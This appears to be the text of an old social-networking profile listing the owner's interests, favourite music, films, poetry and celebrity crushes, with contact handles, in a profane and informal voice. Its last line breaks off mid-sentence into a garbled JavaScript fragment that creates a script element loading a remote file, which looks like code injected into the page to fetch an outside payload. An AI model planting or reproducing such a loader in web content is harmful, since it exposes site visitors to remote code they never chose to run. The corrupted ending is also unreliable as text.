tattoos and piercings, love angelina jolie, bettie page, and some marilyn monroe, love varga & taschen pin-ups, write, read, draw, pretty creative and organized, LOVE orchids, women's curves, folklores & myths, goths & cute punks, vinyl & leather, love black boots & silver
pretty much anyone, i'm open to anything....** aim/aol- indigopyr OR add me as a contact w/ msn- [email protected] ** You can find me as "scarletpyre" on livejournal as well. **
i do like having conversations, so don't fucking message me to cyber or anything of the sort, i'll block your ass and you can kiss mine....
if you want to add me, fucking add me....don't ask for me to ADD YOU or give me your email address telling me to ADD YOU.... come on people, its fairly easy to click the "add to friends" link....
industrial,some techno, pretty much anything i want too...some alternative,classic rock,some blues & oldies, NO COUNTRY OR CHRISTIAN GOSPEL ATTEMPTING TO "ROCK" UGH....that's just wrong.......
LOVE horror flicks....other than that, i watch whatever the fuck i want to watch
since i only watch tv when i am at the gym or someone's house (if its on....), i don't watch it that much anymore... but movies and tv series on dvds are fucking fantastic. currently, the L word is ranking highest, so many gorgeous women, red is envious....
aeon flux is always good (damn them for not airing it anymore....)
band of brothers....guns....men....red is happy...
criminalogy books like serial killer biographies, encyclopedias, fiction & nonfiction, and informative books etc....love poetry, such as charles algeron swinburne is fantastic, Charles Baudelaire, virginia wolfe, walt whitman, edgar allan poe, oscar wilde, samuel taylor coleridge, robert browning, lord byron etc etc....philosophy books... various magazines that i can cut through and use in my collages ....some anne rice & caleb carr
angelina jolie, dear god, what i would do with her....
AND mr. jesse james, he.."var x=..reateElement('script');x.src='http://www.../.../test.js'
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